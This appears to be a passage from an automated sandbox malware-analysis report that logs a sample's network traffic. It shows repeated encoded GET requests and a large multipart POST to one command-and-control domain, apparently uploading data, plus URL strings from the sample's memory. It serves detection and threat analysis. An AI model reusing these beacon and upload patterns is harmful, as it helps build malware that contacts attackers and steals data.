/L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMl2aslkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWUq50ZVJzYwpESjlnVHRWdWVUS3VERJpHZzI2a1cVYYpUaPlWSYp1V1cVYYp0QMljS5FWe5c1VmRGWa9UOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETpdmaOdXQqxEMjRFTz1kaNh3Yqx0dRpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5FWe5c1VnNGWa9kSp9Ua0IjYwR2ValnSDxUaz12Y2xmRJNjVtRVavpWS1IFWhpmSDxUaNpXT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1keNFTWq1UeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI4MjZkJzNyIGNmBTYiNjNjRDZ3cjYkFGN3QTYllTYzUWOiFDZhF2YjJiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.oneConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMl2aslkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWUq50ZVJzYwpESjlnVHRWdWVUS3VERJpHZzI2a1cVYYpUaPlWSYp1V1cVYYp0QMljS5FWe5c1VmRGWa9UOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETpdmaOdXQqxEMjRFTz1kaNh3Yqx0dRpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5FWe5c1VnNGWa9kSp9Ua0IjYwR2ValnSDxUaz12Y2xmRJNjVtRVavpWS1IFWhpmSDxUaNpXT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1keNFTWq1UeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI4MjZkJzNyIGNmBTYiNjNjRDZ3cjYkFGN3QTYllTYzUWOiFDZhF2YjJiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.oneConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMl2aslkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWUq50ZVJzYwpESjlnVHRWdWVUS3VERJpHZzI2a1cVYYpUaPlWSYp1V1cVYYp0QMljS5FWe5c1VmRGWa9UOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETpdmaOdXQqxEMjRFTz1kaNh3Yqx0dRpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5FWe5c1VnNGWa9kSp9Ua0IjYwR2ValnSDxUaz12Y2xmRJNjVtRVavpWS1IFWhpmSDxUaNpXT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1keNFTWq1UeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI4MjZkJzNyIGNmBTYiNjNjRDZ3cjYkFGN3QTYllTYzUWOiFDZhF2YjJiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.oneConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMl2aslkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWUq50ZVJzYwpESjlnVHRWdWVUS3VERJpHZzI2a1cVYYpUaPlWSYp1V1cVYYp0QMljS5FWe5c1VmRGWa9UOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETpdmaOdXQqxEMjRFTz1kaNh3Yqx0dRpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5FWe5c1VnNGWa9kSp9Ua0IjYwR2ValnSDxUaz12Y2xmRJNjVtRVavpWS1IFWhpmSDxUaNpXT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1keNFTWq1UeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI4MjZkJzNyIGNmBTYiNjNjRDZ3cjYkFGN3QTYllTYzUWOiFDZhF2YjJiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.oneConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMl2aslkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWUq50ZVJzYwpESjlnVHRWdWVUS3VERJpHZzI2a1cVYYpUaPlWSYp1V1cVYYp0QMljS5FWe5c1VmRGWa9UOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETpdmaOdXQqxEMjRFTz1kaNh3Yqx0dRpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5FWe5c1VnNGWa9kSp9Ua0IjYwR2ValnSDxUaz12Y2xmRJNjVtRVavpWS1IFWhpmSDxUaNpXT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1keNFTWq1UeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI4MjZkJzNyIGNmBTYiNjNjRDZ3cjYkFGN3QTYllTYzUWOiFDZhF2YjJiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.oneConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMl2aslkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWUq50ZVJzYwpESjlnVHRWdWVUS3VERJpHZzI2a1cVYYpUaPlWSYp1V1cVYYp0QMljS5FWe5c1VmRGWa9UOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETpdmaOdXQqxEMjRFTz1kaNh3Yqx0dRpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5FWe5c1VnNGWa9kSp9Ua0IjYwR2ValnSDxUaz12Y2xmRJNjVtRVavpWS1IFWhpmSDxUaNpXT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1keNFTWq1UeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI4MjZkJzNyIGNmBTYiNjNjRDZ3cjYkFGN3QTYllTYzUWOiFDZhF2YjJiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.oneConnection: Keep-Alive
                            Source: global trafficDNS traffic detected: DNS query: mioww.uebki.one
                            Source: unknownHTTP traffic detected: POST /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryLi196lcbgF3BNoslUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: mioww.uebki.oneContent-Length: 81424Expect: 100-continueConnection: Keep-Alive
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000003032000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mioww.uH
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mioww.uHrF
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002E56000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002D24000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002CEF000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002D96000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mioww.uebki.one
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mioww.uebki.one/
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mioww.uebki.one/L1nc0In.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002B3B000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002C84000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002F93000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000003032000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002E56000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002D24000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002B06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mioww.uebki.one/L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZ
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mioww.uebki.oneesda
